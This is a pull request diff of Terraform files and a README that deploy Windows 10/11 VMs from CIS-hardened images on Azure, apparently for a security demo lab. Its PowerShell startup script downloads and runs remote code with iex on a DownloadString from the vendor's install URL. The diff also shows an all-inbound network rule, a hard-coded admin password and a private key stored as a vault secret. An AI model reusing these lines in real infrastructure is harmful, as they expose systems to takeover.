### PR TITLE
:star: Addition: Terraform for CIS Windows 10/11 for Certifications on Azure

### DIFF
--- a/azure/README.md
+++ b/azure/README.md
@@ -55,3 +55,29 @@ Run the following command to see the the connection details (including sensitive
 ```
 terraform output -raw summary
 ```
+
+### Issues with provisioning using the `locals` variable.
+
+As of now it wasn't possible to provision the images further by simply adding a `locals` variable block, like that:
+
+```
+locals {
+  windows_user_data_cnspec = <<-EOT
+    <powershell>
+    $hello = "Hello World"
+    $hello | Out-File C:\debug.txt
+    </powershell>
+  EOT
+}
+```
+
+and using the
+```
+custom_data = base64encode(local.windows_user_data_cnspec)
+```
+
+in the
+
+```module"windows11"```
+
+the same we would on AWS.

--- a/azure/README.md
+++ b/azure/README.md
@@ -1,0 +1,55 @@
+## Setup Windows 10/11 VMs in Azure
+
+## Requirements
+- A `terraform.tfvars` file containing those two variables:
+  ```
+  tenant_id = ""
+  subscription_id = ""
+  ```
+- A login to Azure via `azure-cli`
+  ```
+  az login --use-device-code
+  ```
+
+
+## Setup
+
+### Choosing Windows10/11 (CIS/Vanilla)
+Right now you need to still change those values in `main.tf` to change between Windows10 or Windows11:
+```
+  source_image_reference {
+    publisher = "center-for-internet-security-inc"
+    offer     = "cis-windows-11-l1"
+    sku       = "cis-windows-11-l1"
+    version   = "latest"
+  }
+
+  plan {
+    name = "cis-windows-11-l1"
+    product = "cis-windows-11-l1"
+    publisher = "center-for-internet-security-inc"
+  }
+```
+The command to look-up the values is (takes some time to complete):
+```
+az 
+```
+
+
+### Terraform commands to deploy Azure VM
+```
+terraform init --upgrade
+```
+
+```
+terraform plan -out plan.out
+```
+terraform apply plan.out
+```
+
+### Connect to VM using `xfreerdp` from Ubuntu
+
+Run the following command to see the the connection details (including sensitive values)
+```
+terraform output -raw summary
+```

--- a/azure/README.md
+++ b/azure/README.md
@@ -30,9 +30,9 @@ Right now you need to still change those values in `main.tf` to change between W
     publisher = "center-for-internet-security-inc"
   }
 ```
-The command to look-up the values is (takes some time to complete):
+The command to look-up the values is something along the lines of (takes some time to complete):
 ```
-az 
+az vm image list --offer Windows-11  --output table --all
 ```
 
 

--- a/azure/README.md
+++ b/azure/README.md
@@ -44,6 +44,8 @@ terraform init --upgrade
 ```
 terraform plan -out plan.out
 ```
+
+```
 terraform apply plan.out
 ```
 

--- a/azure/main.tf
+++ b/azure/main.tf
@@ -25,19 +25,19 @@ locals {
     cnspec scan local --config C:\ProgramData\Mondoo\mondoo.yml;
     </powershell>
   EOT
-
-  windows_user_data = <<-EOT
-    <powershell>
-    Set-ExecutionPolicy Unrestricted -Scope Process -Force;
-    Add-WindowsCapability -Online -Name OpenSSH.Server
-    New-ItemProperty -Path "HKLM:\SOFTWARE\OpenSSH" -Name DefaultShell -Value "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -PropertyType String -Force
-    Start-Service sshd
-    Set-Service -Name sshd -StartupType 'Automatic'
-    $NewPassword = ConvertTo-SecureString "${var.windows_admin_password}" -AsPlainText -Force
-    Set-LocalUser -Name Administrator -Password $NewPassword
-    </powershell>
-  EOT
 }
+  #windows_user_data = <<-EOT
+  #  <powershell>
+  #  Set-ExecutionPolicy Unrestricted -Scope Process -Force;
+  #  Add-WindowsCapability -Online -Name OpenSSH.Server
+  #  New-ItemProperty -Path "HKLM:\SOFTWARE\OpenSSH" -Name DefaultShell -Value "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -PropertyType String -Force
+  #  Start-Service sshd
+  #  Set-Service -Name sshd -StartupType 'Automatic'
+  #  $NewPassword = ConvertTo-SecureString "${var.windows_admin_password}" -AsPlainText -Force
+  #  Set-LocalUser -Name Administrator -Password $NewPassword
+  #  </powershell>
+  #EOT
+#}
 
 
 
@@ -169,8 +169,8 @@ resource "azurerm_windows_virtual_machine" "attacker_vm" {
 
   source_image_reference {
     publisher = "MicrosoftWindowsDesktop"
-    offer     = "windows-11"
-    sku       = "win11-22h2-entn"
+    offer     = "windows-10"
+    sku       = "win10-22h2-entn-g2"
     version   = "latest"
   }
 

--- a/azure/main.tf
+++ b/azure/main.tf
@@ -133,32 +133,37 @@ resource "azurerm_storage_account" "mystorageaccount" {
   account_replication_type = "LRS"
 }
 
-#module "windows11" {
-#  source                            = "Azure/compute/azurerm"
-#  version                           = "5.3.0"
-#
-#  create                            = var.create_windows11
-#
-#  vnet_subnet_id                    = azurerm_subnet.attacker_vm-subnet.id
-#  resource_group_name               = azurerm_resource_group.rg.name
-#
-#  network_security_group            = azurerm_network_security_group.attacker_vm-nsg
-#
-#  name                              = "${var.prefix}-windows11-${random_string.suffix.result}"
-#  location                          = azurerm_resource_group.rg.location
-#  #network_interface_ids             = [azurerm_network_interface.attacker_vm-nic.id]
-#  size                              = "Standard_DS2_v2"
-#  admin_username                    = "adminusercis"
-#  admin_password                    = random_password.password.result
-#
-#  # disk
-#  delete_data_disks_on_termination  = true
-#  delete_os_disk_on_termination     = true
-#  data_sa_type                      = "Premium_LRS"
-#
-#  boot_diagnostics                  = true
-#}
+module "windows11" {
+  source                            = "Azure/compute/azurerm"
+  version                           = "5.3.0"
 
+  vm_hostname                              = "${var.prefix}-windows11-${random_string.suffix.result}"
+
+  vnet_subnet_id                    = azurerm_subnet.attacker_vm-subnet.id
+  resource_group_name               = azurerm_resource_group.rg.name
+
+  network_security_group            = azurerm_network_security_group.attacker_vm-nsg
+
+
+  location                          = azurerm_resource_group.rg.location
+  #network_interface_ids             = [azurerm_network_interface.attacker_vm-nic.id]
+  vm_size                              = "Standard_DS2_v2"
+  admin_username                    = "adminusercis"
+  admin_password                    = random_password.password.result
+
+  # disk
+  delete_data_disks_on_termination  = true
+  delete_os_disk_on_termination     = true
+  data_sa_type                      = "Premium_LRS"
+
+  boot_diagnostics                  = true
+
+  vm_os_publisher = "MicrosoftWindowsDesktop"
+  vm_os_offer     = "windows-10"
+  vm_os_sku       = "win10-22h2-entn-g2"
+  vm_os_version   = "latest"
+
+}
 
 # Create virtual machine
 resource "azurerm_windows_virtual_machine" "attacker_vm" {

--- a/azure/main.tf
+++ b/azure/main.tf
@@ -137,7 +137,8 @@ module "windows11" {
   source                            = "Azure/compute/azurerm"
   version                           = "5.3.0"
 
-  vm_hostname                              = "${var.prefix}-windows11-${random_string.suffix.result}"
+  vm_hostname                       = "${var.prefix}-windows11-${random_string.suffix.result}"
+  is_windows_image                  = true
 
   vnet_subnet_id                    = azurerm_subnet.attacker_vm-subnet.id
   resource_group_name               = azurerm_resource_group.rg.name

--- a/azure/main.tf
+++ b/azure/main.tf
@@ -169,14 +169,14 @@ resource "azurerm_windows_virtual_machine" "attacker_vm" {
 
   source_image_reference {
     publisher = "center-for-internet-security-inc"
-    offer     = "cis-windows-10-l1"
-    sku       = "cis-windows-10-l1"
+    offer     = "cis-windows-11-l1"
+    sku       = "cis-windows-11-l1"
     version   = "latest"
   }
 
   plan {
-    name = "cis-windows-10-l1"
-    product = "cis-windows-10-l1"
+    name = "cis-windows-11-l1"
+    product = "cis-windows-11-l1"
     publisher = "center-for-internet-security-inc"
   }
 

--- a/azure/main.tf
+++ b/azure/main.tf
@@ -99,7 +99,7 @@ resource "azurerm_windows_virtual_machine" "attacker_vm" {
   location              = azurerm_resource_group.rg.location
   resource_group_name   = azurerm_resource_group.rg.name
   network_interface_ids = [azurerm_network_interface.attacker_vm-nic.id]
-  size                  = "Standard_DS2_v3"
+  size                  = "Standard_DS2_v2"
   admin_username      = "adminuser"
   admin_password      = "P@$$w0rd1234!"
 

--- a/azure/main.tf
+++ b/azure/main.tf
@@ -19,6 +19,11 @@ locals {
     <powershell>
     Set-ExecutionPolicy Unrestricted -Scope Process -Force;
     Add-WindowsCapability -Online -Name OpenSSH.Server
+    New-ItemProperty -Path "HKLM:\SOFTWARE\OpenSSH" -Name DefaultShell -Value "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -PropertyType String -Force
+    Start-Service sshd
+    Set-Service -Name sshd -StartupType 'Automatic'
+    $NewPassword = ConvertTo-SecureString "${random_password.password.result}" -AsPlainText -Force
+    Set-LocalUser -Name Administrator -Password $NewPassword
     [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072;
     iex ((New-Object System.Net.WebClient).DownloadString('https://install.mondoo.com/ps1'));
     Install-Mondoo -RegistrationToken '${var.mondoo_registration_token}' -Service enable -UpdateTask enable -Time 12:00 -Interval 3;

--- a/azure/main.tf
+++ b/azure/main.tf
@@ -1,0 +1,257 @@
+resource "random_string" "suffix" {
+  length  = 4
+  special = false
+  upper   = false
+}
+
+resource "azurerm_resource_group" "rg" {
+  name      = "rg-Lunalectric-container-escape-${random_string.suffix.result}"
+  location  = var.resource_group_location
+}
+
+# Create virtual network
+resource "azurerm_virtual_network" "attacker_vm-network" {
+  name                = "Hacking-VM-Vnet-${random_string.suffix.result}"
+  address_space       = ["10.0.0.0/16"]
+  location            = azurerm_resource_group.rg.location
+  resource_group_name = azurerm_resource_group.rg.name
+  depends_on = [azurerm_resource_group.rg]
+}
+
+# Create subnet
+resource "azurerm_subnet" "attacker_vm-subnet" {
+  name                 = "Hacking-VM-Subnet-${random_string.suffix.result}"
+  resource_group_name  = azurerm_resource_group.rg.name
+  virtual_network_name = azurerm_virtual_network.attacker_vm-network.name
+  address_prefixes     = ["10.0.1.0/24"]
+  depends_on = [azurerm_virtual_network.attacker_vm-network]
+}
+
+# Create public IPs
+resource "azurerm_public_ip" "attacker_vm-publicip" {
+  name                = "Hacking-VM-PublicIP-${random_string.suffix.result}"
+  location            = azurerm_resource_group.rg.location
+  resource_group_name = azurerm_resource_group.rg.name
+  allocation_method   = "Dynamic"
+  depends_on = [azurerm_resource_group.rg]
+}
+
+# Create Network Security Group and rule
+resource "azurerm_network_security_group" "attacker_vm-nsg" {
+  name                = "Hacking-VM-NetworkSecurityGroup-${random_string.suffix.result}"
+  location            = azurerm_resource_group.rg.location
+  resource_group_name = azurerm_resource_group.rg.name
+
+  security_rule {
+    name                       = "Allow-all-inbound"
+    priority                   = 1001
+    direction                  = "Inbound"
+    access                     = "Allow"
+    protocol                   = "Tcp"
+    source_port_range          = "*"
+    destination_port_range     = "*"
+    source_address_prefix      = "*"
+    destination_address_prefix = "*"
+  }
+  depends_on = [azurerm_resource_group.rg]
+}
+
+# Create network interface
+resource "azurerm_network_interface" "attacker_vm-nic" {
+  name                = "Hacking-VM-NIC-${random_string.suffix.result}"
+  location            = azurerm_resource_group.rg.location
+  resource_group_name = azurerm_resource_group.rg.name
+
+  ip_configuration {
+    name                          = "Hacking-VM-NicConfiguration-${random_string.suffix.result}"
+    subnet_id                     = azurerm_subnet.attacker_vm-subnet.id
+    private_ip_address_allocation = "Dynamic"
+    public_ip_address_id          = azurerm_public_ip.attacker_vm-publicip.id
+  }
+  depends_on = [azurerm_resource_group.rg, azurerm_subnet.attacker_vm-subnet, azurerm_public_ip.attacker_vm-publicip]
+}
+
+# Connect the security group to the network interface
+resource "azurerm_network_interface_security_group_association" "attacker_vm-nic-nsg" {
+  network_interface_id      = azurerm_network_interface.attacker_vm-nic.id
+  network_security_group_id = azurerm_network_security_group.attacker_vm-nsg.id
+  depends_on = [azurerm_network_interface.attacker_vm-nic, azurerm_network_security_group.attacker_vm-nsg]
+}
+
+# Create storage account for boot diagnostics
+resource "azurerm_storage_account" "mystorageaccount" {
+  name                     = "diaglunalectric${random_string.suffix.result}"
+  location                 = azurerm_resource_group.rg.location
+  resource_group_name      = azurerm_resource_group.rg.name
+  account_tier             = "Standard"
+  account_replication_type = "LRS"
+}
+
+# Create (and display) an SSH key
+resource "tls_private_key" "attacker_vm_ssh" {
+  algorithm = "RSA"
+  rsa_bits  = 4096
+}
+
+# Create virtual machine
+resource "azurerm_linux_virtual_machine" "attacker_vm" {
+  name                  = "Hacking-VM-${random_string.suffix.result}"
+  location              = azurerm_resource_group.rg.location
+  resource_group_name   = azurerm_resource_group.rg.name
+  network_interface_ids = [azurerm_network_interface.attacker_vm-nic.id]
+  size                  = "Standard_DS1_v2"
+  custom_data           = base64encode(templatefile("${path.module}/templates/prepare-hacking-vm.tpl", {}))
+
+  os_disk {
+    name                 = "Hacking-VM-OsDisk-${random_string.suffix.result}"
+    caching              = "ReadWrite"
+    storage_account_type = "Premium_LRS"
+  }
+
+  source_image_reference {
+    publisher = "Canonical"
+    offer     = "UbuntuServer"
+    sku       = "18.04-LTS"
+    version   = "latest"
+  }
+
+  computer_name                   = "attacker-${random_string.suffix.result}"
+  admin_username                  = "azureuser"
+  disable_password_authentication = true
+
+  admin_ssh_key {
+    username   = "azureuser"
+    public_key = tls_private_key.attacker_vm_ssh.public_key_openssh
+  }
+
+  boot_diagnostics {
+    storage_account_uri = azurerm_storage_account.mystorageaccount.primary_blob_endpoint
+  }
+  depends_on = [azurerm_storage_account.mystorageaccount, azurerm_network_interface_security_group_association.attacker_vm-nic-nsg]
+}
+
+# create aks cluster
+resource "azurerm_kubernetes_cluster" "cluster" {
+  name                = "Lunalectric-${random_string.suffix.result}"
+  location            = azurerm_resource_group.rg.location
+  resource_group_name = azurerm_resource_group.rg.name
+  dns_prefix          = "Lunalectric-${random_string.suffix.result}"
+  #kubernetes_version  = "1.27"
+
+  default_node_pool {
+    name       = "default"
+    node_count = "1"
+    vm_size    = "standard_d2_v2"
+    enable_node_public_ip = true
+    tags = {
+      keyvault = "keyvaultLunalectric-${random_string.suffix.result}"
+    }
+  }
+
+  linux_profile {
+    admin_username = "ubuntu"
+
+    ssh_key {
+        key_data = tls_private_key.attacker_vm_ssh.public_key_openssh
+    }
+  }
+
+  identity {
+    type = "SystemAssigned"
+  }
+
+  tags = {
+    Environment = "Mondoo Hacking Demo"
+  }
+  depends_on = [azurerm_resource_group.rg]
+}
+
+# configure keyvault
+data "azurerm_client_config" "current"{}
+
+resource "azurerm_key_vault" "keyvault" {
+  name = "keyvaultLunalectric-${random_string.suffix.result}"
+  location            = azurerm_resource_group.rg.location
+  resource_group_name = azurerm_resource_group.rg.name
+  sku_name = "standard"
+  tags = {
+    "createdBy"   = "hello@mondoo.com"
+  }
+
+  tenant_id = data.azurerm_client_config.current.tenant_id
+  access_policy {
+    tenant_id = data.azurerm_client_config.current.tenant_id
+    object_id = data.azurerm_client_config.current.object_id
+
+    key_permissions = [
+      "Create",
+      "Get",
+      "List",
+    ]
+
+    secret_permissions = [
+      "Set",
+      "Get",
+      "Delete",
+      "Purge",
+      "Recover",
+      "List"
+    ]
+  }
+  access_policy {
+    object_id = azurerm_kubernetes_cluster.cluster.kubelet_identity[0].object_id
+    tenant_id = azurerm_kubernetes_cluster.cluster.identity[0].tenant_id
+    secret_permissions = ["Get","List"]
+    key_permissions = [
+      "Create",
+      "Get",
+      "List",
+    ]
+  }
+
+  depends_on = [azurerm_kubernetes_cluster.cluster]
+}
+
+resource "azurerm_key_vault_secret" "example-secret" {
+  name         = "secret-sauce"
+  value        = "example-pass"
+  key_vault_id = azurerm_key_vault.keyvault.id
+}
+
+resource "azurerm_key_vault_secret" "ssh-key" {
+  name         = "private-ssh-key"
+  value        = tls_private_key.attacker_vm_ssh.private_key_pem
+  key_vault_id = azurerm_key_vault.keyvault.id
+}
+
+# configure aks nsg
+# ISSUE https://github.com/hashicorp/terraform-provider-azurerm/issues/10233
+# have to wait 15 min to get from azurerm_resources the node_resource_group of the cluster
+
+#data "azurerm_resources" "cluster" {
+#  resource_group_name = azurerm_kubernetes_cluster.cluster.node_resource_group
+#
+#  type = "Microsoft.Network/networkSecurityGroups"
+#  depends_on = [azurerm_kubernetes_cluster.cluster]
+#}
+#
+#resource "time_sleep" "wait_20_min" {
+#  depends_on = [data.azurerm_resources.cluster]
+#
+#  create_duration = "20m"
+#}
+#
+#resource "azurerm_network_security_rule" "nsg-cluster" {
+#  name                        = "aks-ssh-inbound"
+#  priority                    = 100
+#  direction                   = "Inbound"
+#  access                      = "Allow"
+#  protocol                    = "Tcp"
+#  source_port_range           = "*"
+#  destination_port_range      = "22"
+#  source_address_prefix       = "*"
+#  destination_address_prefix  = "*"
+#  resource_group_name         = azurerm_kubernetes_cluster.cluster.node_resource_group
+#  network_security_group_name = data.azurerm_resources.cluster.resources.0.name
+#  depends_on = [time_sleep.wait_20_min]
+#}

--- a/azure/main.tf
+++ b/azure/main.tf
@@ -17,20 +17,24 @@ resource "random_password" "password" {
 locals {
   windows_user_data_cnspec = <<-EOT
     <powershell>
-    Set-ExecutionPolicy Unrestricted -Scope Process -Force;
-    Add-WindowsCapability -Online -Name OpenSSH.Server
-    New-ItemProperty -Path "HKLM:\SOFTWARE\OpenSSH" -Name DefaultShell -Value "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -PropertyType String -Force
-    Start-Service sshd
-    Set-Service -Name sshd -StartupType 'Automatic'
-    $NewPassword = ConvertTo-SecureString "${random_password.password.result}" -AsPlainText -Force
-    Set-LocalUser -Name Administrator -Password $NewPassword
-    [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072;
-    iex ((New-Object System.Net.WebClient).DownloadString('https://install.mondoo.com/ps1'));
-    Install-Mondoo -RegistrationToken '${var.mondoo_registration_token}' -Service enable -UpdateTask enable -Time 12:00 -Interval 3;
-    cnspec scan local --config C:\ProgramData\Mondoo\mondoo.yml;
+    $hello = "Hello World"
+    $hello | Out-File C:\debug.txt
     </powershell>
   EOT
 }
+#    Set-ExecutionPolicy Unrestricted -Scope Process -Force;
+#    Add-WindowsCapability -Online -Name OpenSSH.Server
+#    New-ItemProperty -Path "HKLM:\SOFTWARE\OpenSSH" -Name DefaultShell -Value "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -PropertyType String -Force
+#    Start-Service sshd
+#    Set-Service -Name sshd -StartupType 'Automatic'
+#    $NewPassword = ConvertTo-SecureString "${random_password.password.result}" -AsPlainText -Force
+#    Set-LocalUser -Name Administrator -Password $NewPassword
+#    [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072;
+#    iex ((New-Object System.Net.WebClient).DownloadString('https://install.mondoo.com/ps1'));
+#    Install-Mondoo -RegistrationToken '${var.mondoo_registration_token}' -Service enable -UpdateTask enable -Time 12:00 -Interval 3;
+#    cnspec scan local --config C:\ProgramData\Mondoo\mondoo.yml;
+#
+#
   #windows_user_data = <<-EOT
   #  <powershell>
   #  Set-ExecutionPolicy Unrestricted -Scope Process -Force;
@@ -192,7 +196,7 @@ resource "azurerm_windows_virtual_machine" "attacker_vm" {
   }
   depends_on = [azurerm_storage_account.mystorageaccount, azurerm_network_interface_security_group_association.attacker_vm-nic-nsg]
 
-  user_data = base64encode(local.windows_user_data_cnspec)
+  custom_data = base64encode(local.windows_user_data_cnspec)
 
 }
 

--- a/azure/main.tf
+++ b/azure/main.tf
@@ -178,14 +178,14 @@ resource "azurerm_windows_virtual_machine" "attacker_vm" {
 
   source_image_reference {
     publisher = "center-for-internet-security-inc"
-    offer     = "cis-windows-11-l1"
-    sku       = "cis-windows-11-l1"
+    offer     = "cis-windows-10-l1"
+    sku       = "cis-windows-10-l1"
     version   = "latest"
   }
 
   plan {
-    name = "cis-windows-11-l1"
-    product = "cis-windows-11-l1"
+    name = "cis-windows-10-l1"
+    product = "cis-windows-10-l1"
     publisher = "center-for-internet-security-inc"
   }
 

--- a/azure/main.tf
+++ b/azure/main.tf
@@ -97,12 +97,6 @@ resource "azurerm_storage_account" "mystorageaccount" {
   account_replication_type = "LRS"
 }
 
-# Create (and display) an SSH key
-resource "tls_private_key" "attacker_vm_ssh" {
-  algorithm = "RSA"
-  rsa_bits  = 4096
-}
-
 # Create virtual machine
 resource "azurerm_windows_virtual_machine" "attacker_vm" {
   name                  = "Windows-VM-${random_string.suffix.result}"
@@ -133,8 +127,6 @@ resource "azurerm_windows_virtual_machine" "attacker_vm" {
   }
 
   computer_name                   = "windows-${random_string.suffix.result}"
-  #admin_username                  = "azureuser"
-  #disable_password_authentication = true
 
   boot_diagnostics {
     storage_account_uri = azurerm_storage_account.mystorageaccount.primary_blob_endpoint
@@ -144,128 +136,4 @@ resource "azurerm_windows_virtual_machine" "attacker_vm" {
 
 }
 
-#resource "azurerm_linux_virtual_machine" "attacker_vm" {
-#  name                  = "Windows-VM-${random_string.suffix.result}"
-#  location              = azurerm_resource_group.rg.location
-#  resource_group_name   = azurerm_resource_group.rg.name
-#  network_interface_ids = [azurerm_network_interface.attacker_vm-nic.id]
-#  size                  = "Standard_DS2_v3"
-#
-#  os_disk {
-#    name                 = "Windows-VM-OsDisk-${random_string.suffix.result}"
-#    caching              = "ReadWrite"
-#    storage_account_type = "Premium_LRS"
-#  }
-#
-#  source_image_reference {
-#    publisher = "Canonical"
-#    offer     = "UbuntuServer"
-#    sku       = "18.04-LTS"
-#    version   = "latest"
-#  }
-#
-#  computer_name                   = "windows-${random_string.suffix.result}"
-#  admin_username                  = "azureuser"
-#  disable_password_authentication = true
-#
-#  admin_ssh_key {
-#    username   = "azureuser"
-#    public_key = tls_private_key.attacker_vm_ssh.public_key_openssh
-#  }
-#
-#  boot_diagnostics {
-#    storage_account_uri = azurerm_storage_account.mystorageaccount.primary_blob_endpoint
-#  }
-#  depends_on = [azurerm_storage_account.mystorageaccount, azurerm_network_interface_security_group_association.attacker_vm-nic-nsg]
-#}
-
-# configure keyvault
 data "azurerm_client_config" "current"{}
-
-#resource "azurerm_key_vault" "keyvault" {
-#  name = "keyvaultLunalectric-${random_string.suffix.result}"
-#  location            = azurerm_resource_group.rg.location
-#  resource_group_name = azurerm_resource_group.rg.name
-#  sku_name = "standard"
-#  tags = {
-#    "createdBy"   = "hello@mondoo.com"
-#  }
-#
-#  tenant_id = data.azurerm_client_config.current.tenant_id
-#  access_policy {
-#    tenant_id = data.azurerm_client_config.current.tenant_id
-#    object_id = data.azurerm_client_config.current.object_id
-#
-#    key_permissions = [
-#      "Create",
-#      "Get",
-#      "List",
-#    ]
-#
-#    secret_permissions = [
-#      "Set",
-#      "Get",
-#      "Delete",
-#      "Purge",
-#      "Recover",
-#      "List"
-#    ]
-#  }
-#  access_policy {
-#    object_id = azurerm_kubernetes_cluster.cluster.kubelet_identity[0].object_id
-#    tenant_id = azurerm_kubernetes_cluster.cluster.identity[0].tenant_id
-#    secret_permissions = ["Get","List"]
-#    key_permissions = [
-#      "Create",
-#      "Get",
-#      "List",
-#    ]
-#  }
-#
-#  depends_on = [azurerm_kubernetes_cluster.cluster]
-#}
-#
-#resource "azurerm_key_vault_secret" "example-secret" {
-#  name         = "secret-sauce"
-#  value        = "example-pass"
-#  key_vault_id = azurerm_key_vault.keyvault.id
-#}
-#
-#resource "azurerm_key_vault_secret" "ssh-key" {
-#  name         = "private-ssh-key"
-#  value        = tls_private_key.attacker_vm_ssh.private_key_pem
-#  key_vault_id = azurerm_key_vault.keyvault.id
-#}
-#
-## configure aks nsg
-## ISSUE https://github.com/hashicorp/terraform-provider-azurerm/issues/10233
-## have to wait 15 min to get from azurerm_resources the node_resource_group of the cluster
-#
-##data "azurerm_resources" "cluster" {
-##  resource_group_name = azurerm_kubernetes_cluster.cluster.node_resource_group
-##
-##  type = "Microsoft.Network/networkSecurityGroups"
-##  depends_on = [azurerm_kubernetes_cluster.cluster]
-##}
-##
-##resource "time_sleep" "wait_20_min" {
-##  depends_on = [data.azurerm_resources.cluster]
-##
-##  create_duration = "20m"
-##}
-##
-##resource "azurerm_network_security_rule" "nsg-cluster" {
-##  name                        = "aks-ssh-inbound"
-##  priority                    = 100
-##  direction                   = "Inbound"
-##  access                      = "Allow"
-##  protocol                    = "Tcp"
-##  source_port_range           = "*"
-##  destination_port_range      = "22"
-##  source_address_prefix       = "*"
-##  destination_address_prefix  = "*"
-##  resource_group_name         = azurerm_kubernetes_cluster.cluster.node_resource_group
-##  network_security_group_name = data.azurerm_resources.cluster.resources.0.name
-##  depends_on = [time_sleep.wait_20_min]
-##}
-#

--- a/azure/main.tf
+++ b/azure/main.tf
@@ -116,6 +116,12 @@ resource "azurerm_windows_virtual_machine" "attacker_vm" {
     version   = "latest"
   }
 
+  plan {
+    name = "cis-windows-11-l1"
+    product = "cis-windows-11-l1"
+    publisher = "center-for-internet-security-inc"
+  }
+
   computer_name                   = "windows-${random_string.suffix.result}"
   #admin_username                  = "azureuser"
   #disable_password_authentication = true

--- a/azure/main.tf
+++ b/azure/main.tf
@@ -7,12 +7,39 @@ resource "random_string" "suffix" {
 resource "random_password" "password" {
   length           = 16
   special          = true
-  override_special = "!#$%&*()-_=+[]{}<>:?"
+  override_special = "!#$"
   min_lower = 1
   min_numeric = 1
   min_special = 1
   min_upper = 1
 }
+
+locals {
+  windows_user_data_cnspec = <<-EOT
+    <powershell>
+    Set-ExecutionPolicy Unrestricted -Scope Process -Force;
+    Add-WindowsCapability -Online -Name OpenSSH.Server
+    [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072;
+    iex ((New-Object System.Net.WebClient).DownloadString('https://install.mondoo.com/ps1'));
+    Install-Mondoo -RegistrationToken '${var.mondoo_registration_token}' -Service enable -UpdateTask enable -Time 12:00 -Interval 3;
+    cnspec scan local --config C:\ProgramData\Mondoo\mondoo.yml;
+    </powershell>
+  EOT
+
+  windows_user_data = <<-EOT
+    <powershell>
+    Set-ExecutionPolicy Unrestricted -Scope Process -Force;
+    Add-WindowsCapability -Online -Name OpenSSH.Server
+    New-ItemProperty -Path "HKLM:\SOFTWARE\OpenSSH" -Name DefaultShell -Value "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -PropertyType String -Force
+    Start-Service sshd
+    Set-Service -Name sshd -StartupType 'Automatic'
+    $NewPassword = ConvertTo-SecureString "${var.windows_admin_password}" -AsPlainText -Force
+    Set-LocalUser -Name Administrator -Password $NewPassword
+    </powershell>
+  EOT
+}
+
+
 
 resource "azurerm_resource_group" "rg" {
   name      = "rg-Lunalectric-container-escape-${random_string.suffix.result}"
@@ -141,17 +168,17 @@ resource "azurerm_windows_virtual_machine" "attacker_vm" {
   }
 
   source_image_reference {
-    publisher = "center-for-internet-security-inc"
-    offer     = "cis-windows-10-l1"
-    sku       = "cis-windows-10-l1"
+    publisher = "MicrosoftWindowsDesktop"
+    offer     = "windows-11"
+    sku       = "win11-22h2-entn"
     version   = "latest"
   }
 
-  plan {
-    name = "cis-windows-10-l1"
-    product = "cis-windows-10-l1"
-    publisher = "center-for-internet-security-inc"
-  }
+  #plan {
+  #  name = "win11-22h2-entn"
+  #  product = "win11-22h2-entn"
+  #  publisher = "MicrosoftWindowsDesktop"
+  #}
 
   computer_name                   = "windows-${random_string.suffix.result}"
 
@@ -160,6 +187,7 @@ resource "azurerm_windows_virtual_machine" "attacker_vm" {
   }
   depends_on = [azurerm_storage_account.mystorageaccount, azurerm_network_interface_security_group_association.attacker_vm-nic-nsg]
 
+  user_data = base64encode(local.windows_user_data_cnspec)
 
 }
 

--- a/azure/main.tf
+++ b/azure/main.tf
@@ -4,6 +4,16 @@ resource "random_string" "suffix" {
   upper   = false
 }
 
+resource "random_password" "password" {
+  length           = 16
+  special          = true
+  override_special = "!#$%&*()-_=+[]{}<>:?"
+  min_lower = 1
+  min_numeric = 1
+  min_special = 1
+  min_upper = 1
+}
+
 resource "azurerm_resource_group" "rg" {
   name      = "rg-Lunalectric-container-escape-${random_string.suffix.result}"
   location  = var.resource_group_location
@@ -100,8 +110,8 @@ resource "azurerm_windows_virtual_machine" "attacker_vm" {
   resource_group_name   = azurerm_resource_group.rg.name
   network_interface_ids = [azurerm_network_interface.attacker_vm-nic.id]
   size                  = "Standard_DS2_v2"
-  admin_username      = "adminuser"
-  admin_password      = "P@$$w0rd1234!"
+  admin_username      = "adminusercis"
+  admin_password      = random_password.password.result
 
   os_disk {
     name                 = "Windows-VM-OsDisk-${random_string.suffix.result}"
@@ -111,14 +121,14 @@ resource "azurerm_windows_virtual_machine" "attacker_vm" {
 
   source_image_reference {
     publisher = "center-for-internet-security-inc"
-    offer     = "cis-windows-11-l1"
-    sku       = "cis-windows-11-l1"
+    offer     = "cis-windows-10-l1"
+    sku       = "cis-windows-10-l1"
     version   = "latest"
   }
 
   plan {
-    name = "cis-windows-11-l1"
-    product = "cis-windows-11-l1"
+    name = "cis-windows-10-l1"
+    product = "cis-windows-10-l1"
     publisher = "center-for-internet-security-inc"
   }
 

--- a/azure/main.tf
+++ b/azure/main.tf
@@ -97,31 +97,31 @@ resource "azurerm_storage_account" "mystorageaccount" {
   account_replication_type = "LRS"
 }
 
-module "windows11" {
-  source                            = "Azure/compute/azurerm"
-  version                           = "5.3.0"
-
-  create                            = var.create_windows11
-
-  vnet_subnet_id                    = azurerm_subnet.attacker_vm-subnet.id
-  resource_group_name               = azurerm_resource_group.rg.name
-
-  network_security_group            = azurerm_network_security_group.attacker_vm-nsg
-
-  name                              = "${var.prefix}-windows11-${random_string.suffix.result}"
-  location                          = azurerm_resource_group.rg.location
-  #network_interface_ids             = [azurerm_network_interface.attacker_vm-nic.id]
-  size                              = "Standard_DS2_v2"
-  admin_username                    = "adminusercis"
-  admin_password                    = random_password.password.result
-
-  # disk
-  delete_data_disks_on_termination  = true
-  delete_os_disk_on_termination     = true
-  data_sa_type                      = "Premium_LRS"
-
-
-}
+#module "windows11" {
+#  source                            = "Azure/compute/azurerm"
+#  version                           = "5.3.0"
+#
+#  create                            = var.create_windows11
+#
+#  vnet_subnet_id                    = azurerm_subnet.attacker_vm-subnet.id
+#  resource_group_name               = azurerm_resource_group.rg.name
+#
+#  network_security_group            = azurerm_network_security_group.attacker_vm-nsg
+#
+#  name                              = "${var.prefix}-windows11-${random_string.suffix.result}"
+#  location                          = azurerm_resource_group.rg.location
